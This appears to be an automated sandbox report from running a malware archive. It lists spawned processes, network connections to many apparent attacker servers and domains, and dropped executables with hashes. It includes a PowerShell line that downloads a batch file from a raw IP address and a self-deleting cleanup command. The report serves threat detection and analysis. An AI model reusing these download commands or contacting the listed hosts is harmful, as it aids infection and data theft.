"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\5F3EKF3EUA1N" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13199558291903964600,2142906715990327137,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa387d855 /state1:0x41c64e6d
C:\Program Files (x86)\Google\Temp\explorer.exe
"C:\Program Files (x86)\Google\Temp\explorer.exe"
C:\Users\Admin\AppData\Local\updater.exe
"C:\Users\Admin\AppData\Local\updater.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.194.101.151.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | www.333zz.top | udp |
| US | 20.83.148.22:80 | tcp | |
| CN | 140.210.18.161:88 | www.333zz.top | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| NL | 91.92.240.41:7575 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 151.101.194.49:443 | urlhaus.abuse.ch | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rddissisifigifidi.net | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| NL | 91.92.240.41:7575 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| NL | 89.110.69.103:80 | tcp | |
| DE | 94.156.177.33:80 | 94.156.177.33 | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 234.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.177.156.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grupodulcemar.pe | udp |
| PE | 161.132.57.101:80 | grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nextjs-boilerplate-liard-nine-70.vercel.app | udp |
| US | 64.29.17.193:443 | nextjs-boilerplate-liard-nine-70.vercel.app | tcp |
| US | 8.8.8.8:53 | loeghaiofiehfihf.to | udp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| US | 8.8.8.8:53 | 193.17.29.64.in-addr.arpa | udp |
| DE | 212.113.107.84:80 | 212.113.107.84 | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| NL | 89.110.69.103:80 | tcp | |
| US | 8.8.8.8:53 | 84.107.113.212.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | tcp | |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| RU | 80.66.89.90:80 | tcp | |
| DE | 147.45.47.156:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| BR | 132.226.247.73:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 73.247.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.67.21.104.in-addr.arpa | udp |
| NL | 91.92.240.41:7575 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| HK | 101.36.117.41:8880 | 101.36.117.41 | tcp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.117.36.101.in-addr.arpa | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | PCSCspZQULzLuUe.PCSCspZQULzLuUe | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| NL | 84.53.175.9:80 | r11.o.lencr.org | tcp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 9.175.53.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.216.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| NL | 91.92.240.41:7575 | tcp | |
| US | 8.8.8.8:53 | 186.58.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| RU | 80.66.89.90:80 | tcp | |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| DE | 147.45.47.156:80 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 136.63.122.92.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 80.76.49.229:7000 | tcp | |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| IR | 2.189.231.17:40500 | udp | |
| UZ | 89.236.218.158:40500 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| IN | 103.92.101.54:80 | 103.92.101.54 | tcp |
| US | 8.8.8.8:53 | 17.231.189.2.in-addr.arpa | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 54.101.92.103.in-addr.arpa | udp |
| FI | 95.217.25.228:443 | tcp | |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | egorepetiiiosn.shop | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | shelterryujxo.shop | udp |
| US | 8.8.8.8:53 | chequedxmznp.shop | udp |
| N/A | 192.168.43.241:4782 | tcp | |
| US | 8.8.8.8:53 | illnesmunxkza.shop | udp |
| US | 8.8.8.8:53 | triallyforwhgh.shop | udp |
| US | 8.8.8.8:53 | shootydowtqosm.shop | udp |
| US | 8.8.8.8:53 | faceddullinhs.shop | udp |
| UZ | 89.236.216.14:40500 | udp | |
| US | 8.8.8.8:53 | ammycanedpors.shop | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 14.216.236.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tacitglibbr.biz | udp |
| US | 172.67.164.37:443 | tacitglibbr.biz | tcp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 8.8.8.8:53 | 37.164.67.172.in-addr.arpa | udp |
| US | 104.21.22.222:443 | immureprech.biz | tcp |
| US | 8.8.8.8:53 | ponintnykqwm.shop | udp |
| US | 8.8.8.8:53 | seallysl.site | udp |
| US | 8.8.8.8:53 | opposezmny.site | udp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 8.8.8.8:53 | goalyfeastz.site | udp |
| US | 104.21.112.1:443 | deafeninggeh.biz | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | contemteny.site | udp |
| US | 8.8.8.8:53 | dilemmadu.site | udp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 8.8.8.8:53 | faulteyotk.site | udp |
| US | 8.8.8.8:53 | 222.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | authorisev.site | udp |
| US | 8.8.8.8:53 | servicedny.site | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 104.21.74.196:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 172.67.143.116:443 | awake-weaves.cyou | tcp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 172.67.141.195:443 | sordid-snaked.cyou | tcp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 196.74.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.143.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.141.67.172.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | tcp | |
| IR | 5.235.185.18:40500 | udp | |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 18.185.235.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| UZ | 90.156.167.42:40500 | udp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| NL | 91.92.240.41:7575 | tcp | |
| US | 8.8.8.8:53 | 42.167.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 88.221.135.106:80 | e5.o.lencr.org | tcp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| IR | 2.189.31.47:40500 | udp | |
| RU | 89.169.1.26:7777 | tcp | |
| RU | 83.217.206.117:3389 | tcp | |
| RU | 89.169.17.253:8080 | tcp | |
| RU | 83.217.197.147:143 | tcp | |
| RU | 83.217.192.193:22 | tcp | |
| RU | 89.169.5.41:8443 | tcp | |
| RU | 83.217.197.147:80 | tcp | |
| RU | 83.217.192.194:8080 | tcp | |
| RU | 83.217.197.147:80 | tcp | |
| RU | 213.108.16.145:80 | tcp | |
| RU | 178.215.65.201:179 | tcp | |
| RU | 83.217.197.147:80 | tcp | |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.242.5.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.31.189.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.197.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.206.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.192.217.83.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 194.192.217.83.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| MX | 189.142.102.173:40500 | udp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 173.102.142.189.in-addr.arpa | udp |
| NL | 92.122.63.136:443 | steamcommunity.com | tcp |
| YE | 94.26.219.44:40500 | tcp | |
| FI | 95.217.25.228:443 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 80.76.49.229:7000 | tcp | |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.16:443 | ei.phncdn.com | tcp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| GB | 64.210.156.17:443 | media.trafficjunky.net | tcp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| N/A | 192.168.43.241:4782 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 17.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.201.250.142.in-addr.arpa | udp |
| GB | 64.210.156.16:443 | media.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| GB | 64.210.156.23:443 | ss.phncdn.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | pix-ht.trafficjunky.net | udp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| IR | 46.248.37.226:40500 | udp | |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 23.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.37.248.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\4363463463464363463463463.exe
| MD5 | 2a94f3960c58c6e70826495f76d00b85 |
| SHA1 | e2a1a5641295f5ebf01a37ac1c170ac0814bb71a |
| SHA256 | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce |
| SHA512 | fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f |
memory/1876-12-0x000000007505E000-0x000000007505F000-memory.dmp
memory/1876-13-0x00000000000F0000-0x00000000000F8000-memory.dmp
memory/1876-14-0x0000000004AA0000-0x0000000004B3C000-memory.dmp
memory/1876-15-0x0000000075050000-0x0000000075800000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\test-again.exe
| MD5 | d9fd5136b6c954359e8960d0348dbd58 |
| SHA1 | 44800a8d776fd6de3e4246a559a5c2ac57c12eeb |
| SHA256 | 55eb3a38362b44d13ae622cc81df37d1d7089c15f6608fd46543df395569e816 |
| SHA512 | 86add0c5fd4d7eff19ce3828c2fe8501d51566cad047d7e480acf3e0bc227e3bda6a27aa65f7b2fd77d34cd009de73c98014d0323d8cf35ba06e5451eee5e9b0 |
memory/212-24-0x0000000000970000-0x00000000009C4000-memory.dmp
memory/212-25-0x00007FF99D590000-0x00007FF99D61D000-memory.dmp
memory/212-27-0x00000000000D0000-0x00000000000D3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe
| MD5 | 1873f27a43f63c02800d6c80014c0235 |
| SHA1 | 3441bba24453db09fb56e02a9d56cdf775886f07 |
| SHA256 | 4bfcba248d79dfd6c2cba52d7c9ee18842f007bfa0e3ba99ababacb4794e8c6e |
| SHA512 | 9f2b663afc1cc3dbc8eba3278f61ffb41c19e42f94ee4c8a60eff83c8846b81d34e4ff869b643434a8ad5657c46bd06a712f0598062b62802ba6f0ee6f4fb8f2 |
memory/1876-35-0x000000007505E000-0x000000007505F000-memory.dmp
memory/1876-38-0x0000000075050000-0x0000000075800000-memory.dmp
memory/212-39-0x0000000000400000-0x0000000000460000-memory.dmp
memory/212-40-0x00007FF99D590000-0x00007FF99D61D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\New Text Document mod.exe
| MD5 | 69994ff2f00eeca9335ccd502198e05b |
| SHA1 | b13a15a5bea65b711b835ce8eccd2a699a99cead |
| SHA256 | 2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2 |
| SHA512 | ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3 |
memory/4580-53-0x0000000000730000-0x0000000000738000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe
| MD5 | 0c883b1d66afce606d9830f48d69d74b |
| SHA1 | fe431fe73a4749722496f19b3b3ca0b629b50131 |
| SHA256 | d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1 |
| SHA512 | c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5 |
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nothjgdwa.exe
| MD5 | 108530f51d914a0a842bd9dc66838636 |
| SHA1 | 806ca71de679d73560722f5cb036bd07241660e3 |
| SHA256 | 20ad93fa1ed6b5a682d8a4c8ba681f566597689d6ea943c2605412b233f0a538 |
| SHA512 | 8e1cdc49b57715b34642a55ee7a3b0cfa603e9a905d5a2a0108a7b2e3d682faec51c69b844a03088f2f4a50a7bf27feb3aabd9733853d9fb4b2ee4419261d05b |
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\random.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\u1w30Wt.exe
| MD5 | e3eb0a1df437f3f97a64aca5952c8ea0 |
| SHA1 | 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a |
| SHA256 | 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521 |
| SHA512 | 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf |
C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\client.exe
| MD5 | 52a3c7712a84a0f17e9602828bf2e86d |
| SHA1 | 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2 |
| SHA256 | afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288 |
| SHA512 | 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac |
memory/2640-117-0x000001C177610000-0x000001C1777D2000-memory.dmp
memory/2640-116-0x000001C174FE0000-0x000001C174FF8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe
| MD5 | 4f964ada28fa2dde5c75d3c3682e69c4 |
| SHA1 | 481a0ddc3dfd39147abf684b60b6a0b1dfbbc341 |
| SHA256 | 7b0699fb946ce952624a3d5807839fb1a0613993270aca8227f35001b790b945 |
| SHA512 | ab07c9602776dc062599a89eed9d38be2c95f563a9ed9c906e6c1066f80e5666f119c5a790a120bf626a73edd3cc178924262d41c0f65eb20fcf3b542a83dc68 |
memory/3064-127-0x0000000000240000-0x000000000040A000-memory.dmp
memory/3064-129-0x0000000000BC0000-0x0000000000BCE000-memory.dmp
memory/3064-131-0x0000000000C00000-0x0000000000C1C000-memory.dmp
memory/3064-132-0x0000000000BE0000-0x0000000000BFC000-memory.dmp
memory/3064-133-0x000000001B1A0000-0x000000001B1F0000-memory.dmp
memory/3064-137-0x0000000000C00000-0x0000000000C0E000-memory.dmp
